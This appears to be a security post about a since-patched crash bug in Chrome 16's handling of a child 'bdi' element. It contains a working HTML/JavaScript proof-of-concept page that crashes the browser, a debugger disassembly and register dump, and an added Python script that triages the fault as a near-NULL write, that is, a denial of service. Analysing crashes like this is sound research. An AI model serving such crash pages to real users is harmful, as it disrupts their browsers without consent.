Patched in Chrome 17.0.963.46 m. Independently discovered by a fuzzer written by me, but alas, the Google team quickly patched the bug.
The bug was in the improper processing of the child "bdi" tag.
Team : Legion Of Xtremers
Special Thanx To : Secfence
Code:
<html>
<head><title>
Chrome "16.0.912.77 m" crash
</title></head>
<body>
<script>
// Create an <a> element and hang a string of U+4141 code units off it
// (the classic 0x41414141 fill pattern).
var alfa = document.createElement("a");
alfa.code = unescape("%u4141%u4141");
var beta = null;
var gamma = null;
beta = document.body.appendChild(alfa);
// Appending to outerHTML re-parses the element and replaces it in the tree,
// so "beta" now refers to the detached original <a> node.
beta.outerHTML += alfa.code;
// beta.innerHTML += alfa.code;
// Append a <bdi> element and store it on the detached node; the crash was
// attributed to the handling of this child "bdi" tag.
gamma = document.createElement("bdi");
beta.t1 = document.body.appendChild(gamma);
</script>
</body>
</html>
Code:
6A9C03D3 EB 11 JMP SHORT chrome_1.6A9C03E6
6A9C03D5 8B49 10 MOV ECX,DWORD PTR DS:[ECX+10]
6A9C03D8 3951 10 CMP DWORD PTR DS:[ECX+10],EDX
6A9C03DB ^75 F8 JNZ SHORT chrome_1.6A9C03D5
6A9C03DD 8BBD 74FFFFFF MOV EDI,DWORD PTR SS:[EBP-8C]
6A9C03E3 8979 10 MOV DWORD PTR DS:[ECX+10],EDI
6A9C03E6 8B4A 10 MOV ECX,DWORD PTR DS:[EDX+10]
6A9C03E9 8BBD 78FFFFFF MOV EDI,DWORD PTR SS:[EBP-88]
6A9C03EF 894F 10 MOV DWORD PTR DS:[EDI+10],ECX // Crash occurs here
6A9C03F2 3950 04 CMP DWORD PTR DS:[EAX+4],EDX
6A9C03F5 75 09 JNZ SHORT chrome_1.6A9C0400
6A9C03F7 8B8D 78FFFFFF MOV ECX,DWORD PTR SS:[EBP-88]
6A9C03FD 8948 04 MOV DWORD PTR DS:[EAX+4],ECX
6A9C0400 3950 08 CMP DWORD PTR DS:[EAX+8],EDX
6A9C0403 75 09 JNZ SHORT chrome_1.6A9C040E
6A9C0405 8B8D 7CFFFFFF MOV ECX,DWORD PTR SS:[EBP-84]
6A9C040B 8948 08 MOV DWORD PTR DS:[EAX+8],ECX
6A9C040E 8B4D 80 MOV ECX,DWORD PTR SS:[EBP-80]
Code:
EAX 0034ECE8
ECX 0432DA9C
EDX 0432DABC
EBX 0034ED14
ESP 0034E9F0
EBP 0034EB34
ESI 00000000
EDI 00000000
EIP 6A9C03EF chrome_1.6A9C03EF
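The first thing to check in a dump like this is what the faulting instruction actually touched: `MOV DWORD PTR DS:[EDI+10],ECX` with EDI = 00000000 is a write to address 0x00000010, i.e. a NULL pointer plus a field offset, not an attacker-controlled write. The script below is an added triage example, not part of the original post or of the Chrome source: it parses the OllyDbg listing and register pane reproduced above (embedded as constructed sample input), computes the effective address of every memory operand, and classifies the instruction at EIP. The 64 KiB "near-NULL" threshold is an assumption based on the lowest 64 KiB of a Win32 process never being mapped; effective addresses of instructions other than the one at EIP are computed from the register snapshot at the fault and are only exact if those registers had not changed since.

```python
import re

# Constructed sample input, copied from the OllyDbg dump in the post: the
# disassembly around the fault and the register values at the time of the fault.
DISASM = """\
6A9C03D5 8B49 10 MOV ECX,DWORD PTR DS:[ECX+10]
6A9C03D8 3951 10 CMP DWORD PTR DS:[ECX+10],EDX
6A9C03DB ^75 F8 JNZ SHORT chrome_1.6A9C03D5
6A9C03DD 8BBD 74FFFFFF MOV EDI,DWORD PTR SS:[EBP-8C]
6A9C03E3 8979 10 MOV DWORD PTR DS:[ECX+10],EDI
6A9C03E6 8B4A 10 MOV ECX,DWORD PTR DS:[EDX+10]
6A9C03E9 8BBD 78FFFFFF MOV EDI,DWORD PTR SS:[EBP-88]
6A9C03EF 894F 10 MOV DWORD PTR DS:[EDI+10],ECX // Crash occurs here
6A9C03F2 3950 04 CMP DWORD PTR DS:[EAX+4],EDX
"""

REGISTERS = """\
EAX 0034ECE8
ECX 0432DA9C
EDX 0432DABC
EBX 0034ED14
ESP 0034E9F0
EBP 0034EB34
ESI 00000000
EDI 00000000
EIP 6A9C03EF chrome_1.6A9C03EF
"""

# Assumption: the lowest 64 KiB of a Win32 process address space is never mapped,
# so any access below this limit is a NULL pointer (plus field offset) dereference.
NEAR_NULL_LIMIT = 0x10000

# "address bytes... MNEMONIC operands"; OllyDbg prints a '^' before backward jumps.
INSN_RE = re.compile(r"^([0-9A-F]{8})\s+((?:\^?[0-9A-F]+\s+)+)([A-Z]{2,6})(?:\s+(.*?))?\s*$")
REG_RE = re.compile(r"^(E[A-D]X|E[SD]I|E[SB]P|EIP)\s+([0-9A-F]{8})")
# Memory operand such as DS:[EDI+10] or SS:[EBP-8C]; displacements are hex.
MEM_RE = re.compile(r"\[(E[A-Z]{2})(?:([+-])([0-9A-F]+))?\]")
NON_WRITING = {"CMP", "TEST", "PUSH"}  # these only read a memory destination operand


def parse_registers(dump):
    """Map register name -> value from an OllyDbg-style register pane."""
    regs = {}
    for line in dump.splitlines():
        m = REG_RE.match(line.strip())
        if m:
            regs[m.group(1)] = int(m.group(2), 16)
    return regs


def parse_insn(line):
    """Split one listing line into address, mnemonic and operands (// comments dropped)."""
    m = INSN_RE.match(line.split("//")[0].strip())
    if not m:
        return None
    return {"eip": int(m.group(1), 16), "mnemonic": m.group(3), "operands": m.group(4) or ""}


def memory_access(insn, regs):
    """Return (effective address, 'read' or 'write'), or None if no memory operand."""
    m = MEM_RE.search(insn["operands"])
    if not m:
        return None
    ea = regs[m.group(1)]
    if m.group(2):
        disp = int(m.group(3), 16)
        ea += disp if m.group(2) == "+" else -disp
    ea &= 0xFFFFFFFF
    # Intel syntax: the destination operand comes first; a bracketed destination is written.
    dest = insn["operands"].split(",")[0]
    is_write = "[" in dest and insn["mnemonic"] not in NON_WRITING
    return ea, "write" if is_write else "read"


def triage(disasm, regs):
    """List every memory access in the listing and classify the one at EIP."""
    report = []
    for line in disasm.splitlines():
        insn = parse_insn(line)
        if insn is None:
            continue
        acc = memory_access(insn, regs)
        if acc is None:
            continue
        ea, kind = acc
        entry = {"eip": insn["eip"], "ea": ea, "access": kind,
                 "faulting": insn["eip"] == regs["EIP"]}
        if entry["faulting"]:
            if ea < NEAR_NULL_LIMIT:
                entry["verdict"] = "near-NULL %s at 0x%08X: unchecked NULL pointer, crash/DoS" % (kind, ea)
            else:
                entry["verdict"] = "%s at 0x%08X: investigate where the pointer came from" % (kind, ea)
        report.append(entry)
    return report


if __name__ == "__main__":
    for e in triage(DISASM, parse_registers(REGISTERS)):
        flag = "  <== " + e["verdict"] if e["faulting"] else ""
        print("%08X %-5s 0x%08X%s" % (e["eip"], e["access"], e["ea"], flag))
```

Run against the dump above it reports the fault as a near-NULL write to 0x00000010, which is consistent with a missing NULL check on a node pointer (EDI was just loaded from a stack slot at [EBP-88]) rather than a write through corrupted data; that distinction is what decides whether a fuzzer crash like this is a plain DoS or worth exploitation work.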